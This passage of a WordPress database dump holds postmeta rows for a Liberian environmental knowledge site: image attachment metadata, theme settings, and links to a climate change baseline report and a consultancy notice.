extra_audio_preload','false'),(36599,5397,'video_tab',''),(36600,5397,'kava_extra_video_type','library'),(36601,5397,'kava_extra_video_library',''),(36602,5397,'kava_extra_video_external',''),(36603,5397,'kava_extra_video_poster',''),(36604,5397,'kava_extra_video_width','770'),(36605,5397,'kava_extra_video_height','480'),(36606,5397,'kava_extra_video_loop','false'),(36607,5397,'kava_extra_video_autoplay','false'),(36608,5397,'kava_extra_video_preload','false'),(36609,5400,'_edit_lock','1746679789:38'),(36610,5400,'_last_editor_used_jetpack','block-editor'),(36611,5401,'_wp_attached_file','2025/05/EPA1.jpg'),(36612,5401,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:16:\"2025/05/EPA1.jpg\";s:8:\"filesize\";i:343641;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"EPA1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20845;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"EPA1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169845;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"EPA1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"EPA1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104518;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"EPA1-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324233;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"EPA1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29255;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:15:\"EPA1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5665;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:16:\"EPA1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16893;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:16:\"EPA1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44067;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:16:\"EPA1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47560;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:16:\"EPA1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66542;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:17:\"EPA1-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167745;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:18:\"EPA1-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:351293;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:16:\"EPA1-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69622;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:16:\"EPA1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95891;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:17:\"EPA1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171003;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36615,5400,'_thumbnail_id','5401'),(36616,5400,'_edit_last','38'),(36617,5400,'kava_extra_enable_breadcrumbs','inherit'),(36618,5400,'post_formats',''),(36619,5400,'gallery_tab',''),(36620,5400,'kava_extra_gallery_images',''),(36621,5400,'link_tab',''),(36622,5400,'kava_extra_link',''),(36623,5400,'kava_extra_link_target','_blank'),(36624,5400,'quote_tab',''),(36625,5400,'kava_extra_quote_text',''),(36626,5400,'kava_extra_quote_cite',''),(36627,5400,'audio_tab',''),(36628,5400,'kava_extra_audio',''),(36629,5400,'kava_extra_audio_loop','false'),(36630,5400,'kava_extra_audio_autoplay','false'),(36631,5400,'kava_extra_audio_preload','false'),(36632,5400,'video_tab',''),(36633,5400,'kava_extra_video_type','library'),(36634,5400,'kava_extra_video_library',''),(36635,5400,'kava_extra_video_external',''),(36636,5400,'kava_extra_video_poster',''),(36637,5400,'kava_extra_video_width','770'),(36638,5400,'kava_extra_video_height','480'),(36639,5400,'kava_extra_video_loop','false'),(36640,5400,'kava_extra_video_autoplay','false'),(36641,5400,'kava_extra_video_preload','false'),(36642,5403,'_edit_lock','1746723496:38'),(36643,5403,'_last_editor_used_jetpack','block-editor'),(36648,5406,'_edit_lock','1747064068:38'),(36649,5406,'_last_editor_used_jetpack','block-editor'),(36650,5407,'_wp_attached_file','2025/05/05f0f762-a84b-4de2-96ed-3ca8dc13b14c.jpeg'),(36651,5407,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:49:\"2025/05/05f0f762-a84b-4de2-96ed-3ca8dc13b14c.jpeg\";s:8:\"filesize\";i:217236;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13402;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-1024x576.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105965;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6759;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65406;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-1536x864.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201724;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23359;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4572;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13218;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33115;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36560;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54850;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131752;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-600x338.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43889;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72345;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:50:\"05f0f762-a84b-4de2-96ed-3ca8dc13b14c-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137175;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36654,5406,'_thumbnail_id','5407'),(36655,5406,'_edit_last','38'),(36656,5406,'kava_extra_enable_breadcrumbs','inherit'),(36657,5406,'post_formats',''),(36658,5406,'gallery_tab',''),(36659,5406,'kava_extra_gallery_images',''),(36660,5406,'link_tab',''),(36661,5406,'kava_extra_link',''),(36662,5406,'kava_extra_link_target','_blank'),(36663,5406,'quote_tab',''),(36664,5406,'kava_extra_quote_text',''),(36665,5406,'kava_extra_quote_cite',''),(36666,5406,'audio_tab',''),(36667,5406,'kava_extra_audio',''),(36668,5406,'kava_extra_audio_loop','false'),(36669,5406,'kava_extra_audio_autoplay','false'),(36670,5406,'kava_extra_audio_preload','false'),(36671,5406,'video_tab',''),(36672,5406,'kava_extra_video_type','library'),(36673,5406,'kava_extra_video_library',''),(36674,5406,'kava_extra_video_external',''),(36675,5406,'kava_extra_video_poster',''),(36676,5406,'kava_extra_video_width','770'),(36677,5406,'kava_extra_video_height','480'),(36678,5406,'kava_extra_video_loop','false'),(36679,5406,'kava_extra_video_autoplay','false'),(36680,5406,'kava_extra_video_preload','false'),(36681,5409,'_edit_lock','1747065684:38'),(36682,5409,'_last_editor_used_jetpack','block-editor'),(36683,5410,'_wp_attached_file','2025/05/c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e.jpeg'),(36684,5410,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:49:\"2025/05/c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e.jpeg\";s:8:\"filesize\";i:325852;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26567;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:234092;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9698;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146601;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37864;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6403;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21029;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57494;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64368;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90240;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217044;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94722;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133771;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:50:\"c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230751;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36687,5409,'_thumbnail_id','5410'),(36688,5409,'_edit_last','38'),(36689,5409,'kava_extra_enable_breadcrumbs','inherit'),(36690,5409,'post_formats',''),(36691,5409,'gallery_tab',''),(36692,5409,'kava_extra_gallery_images',''),(36693,5409,'link_tab',''),(36694,5409,'kava_extra_link',''),(36695,5409,'kava_extra_link_target','_blank'),(36696,5409,'quote_tab',''),(36697,5409,'kava_extra_quote_text',''),(36698,5409,'kava_extra_quote_cite',''),(36699,5409,'audio_tab',''),(36700,5409,'kava_extra_audio',''),(36701,5409,'kava_extra_audio_loop','false'),(36702,5409,'kava_extra_audio_autoplay','false'),(36703,5409,'kava_extra_audio_preload','false'),(36704,5409,'video_tab',''),(36705,5409,'kava_extra_video_type','library'),(36706,5409,'kava_extra_video_library',''),(36707,5409,'kava_extra_video_external',''),(36708,5409,'kava_extra_video_poster',''),(36709,5409,'kava_extra_video_width','770'),(36710,5409,'kava_extra_video_height','480'),(36711,5409,'kava_extra_video_loop','false'),(36712,5409,'kava_extra_video_autoplay','false'),(36713,5409,'kava_extra_video_preload','false'),(36714,5412,'_edit_lock','1747135589:38'),(36715,5412,'_last_editor_used_jetpack','block-editor'),(36716,5413,'_wp_attached_file','2025/05/youth_dialogue.jpg'),(36717,5413,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:26:\"2025/05/youth_dialogue.jpg\";s:8:\"filesize\";i:236791;s:5:\"sizes\";a:13:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10944;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126211;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36665;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:25:\"youth_dialogue-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7210;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21793;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50916;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53440;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77449;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-940x650.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155434;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-600x503.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87369;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103146;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:26:\"youth_dialogue-940x640.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151872;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:30:\"Business Plan Competition - 16\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:30:\"Business Plan Competition - 16\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36720,5412,'_thumbnail_id','5413'),(36721,5412,'_edit_last','38'),(36722,5412,'kava_extra_enable_breadcrumbs','inherit'),(36723,5412,'post_formats',''),(36724,5412,'gallery_tab',''),(36725,5412,'kava_extra_gallery_images',''),(36726,5412,'link_tab',''),(36727,5412,'kava_extra_link',''),(36728,5412,'kava_extra_link_target','_blank'),(36729,5412,'quote_tab',''),(36730,5412,'kava_extra_quote_text',''),(36731,5412,'kava_extra_quote_cite',''),(36732,5412,'audio_tab',''),(36733,5412,'kava_extra_audio',''),(36734,5412,'kava_extra_audio_loop','false'),(36735,5412,'kava_extra_audio_autoplay','false'),(36736,5412,'kava_extra_audio_preload','false'),(36737,5412,'video_tab',''),(36738,5412,'kava_extra_video_type','library'),(36739,5412,'kava_extra_video_library',''),(36740,5412,'kava_extra_video_external',''),(36741,5412,'kava_extra_video_poster',''),(36742,5412,'kava_extra_video_width','770'),(36743,5412,'kava_extra_video_height','480'),(36744,5412,'kava_extra_video_loop','false'),(36745,5412,'kava_extra_video_autoplay','false'),(36746,5412,'kava_extra_video_preload','false'),(36747,5415,'_last_editor_used_jetpack','classic-editor'),(36748,5415,'_edit_lock','1747270493:38'),(36749,5415,'_edit_last','38'),(36750,5416,'_wp_attached_file','2025/05/Cover-Page.jpg'),(36751,5416,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:401;s:6:\"height\";i:568;s:4:\"file\";s:22:\"2025/05/Cover-Page.jpg\";s:8:\"filesize\";i:21336;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Cover-Page-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8107;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Cover-Page-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3321;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"Cover-Page-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8885;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"Cover-Page-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2391;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"Cover-Page-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5837;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"Cover-Page-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11604;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"Cover-Page-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15200;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"Cover-Page-401x450.jpg\";s:5:\"width\";i:401;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:6:\"EPA IT\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1747242646\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36752,5417,'_wp_attached_file','2025/05/Consolidated-Summary_Liberia_Climate_Change_Baseline_Reports-Final.pdf'),(36753,5417,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:2176895;}'),(36754,5415,'_wp_page_template','default'),(36755,5415,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/05/Consolidated-Summary_Liberia_Climate_Change_Baseline_Reports-Final.pdf'),(36756,5415,'by','Novasphere / EPA'),(36757,5415,'year','2025'),(36758,5415,'_pods_document_cover_image','a:1:{i:0;i:5416;}'),(36759,5415,'document_cover_image','5416'),(36760,5415,'_pods_attached_document','a:1:{i:0;i:5417;}'),(36761,5415,'attached_document','5417'),(36762,5420,'_edit_lock','1747770872:38'),(36763,5420,'_last_editor_used_jetpack','block-editor'),(36764,5421,'_last_editor_used_jetpack','classic-editor'),(36765,5421,'_edit_lock','1747768061:38'),(36766,5421,'_edit_last','38'),(36767,5422,'_wp_attached_file','2025/05/TOR_EIC-Renovation_MMCRP-Activity-3.1.1_final_clean-1-1.pdf'),(36768,5422,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:315671;}'),(36769,5421,'_wp_page_template','default'),(36770,5421,'closed_date','2025-06-05'),(36771,5421,'owner','Project (MMCRP)'),(36772,5421,'vacancy_link','https://ekmsliberia.info/ekms-bulletin/consultancy-notice-for-a-national-civil-or-construction-engineering-firm-to-extend-the-existing-nathaniel-varney-massaquoi-kindergarten-elementary-junior-high-school-building-in-west-point-township/tor_eic-renovation'),(36773,5425,'_edit_lock','1747768906:38'),(36774,5425,'_last_editor_used_jetpack','block-editor'),(36775,5426,'_wp_attached_file','2025/05/Ty.jpeg'),(36776,5426,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:584;s:4:\"file\";s:15:\"2025/05/Ty.jpeg\";s:8:\"filesize\";i:91748;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"Ty-300x162.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17962;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"Ty-1024x554.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124828;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"Ty-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9452;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"Ty-768x415.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80451;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:15:\"Ty-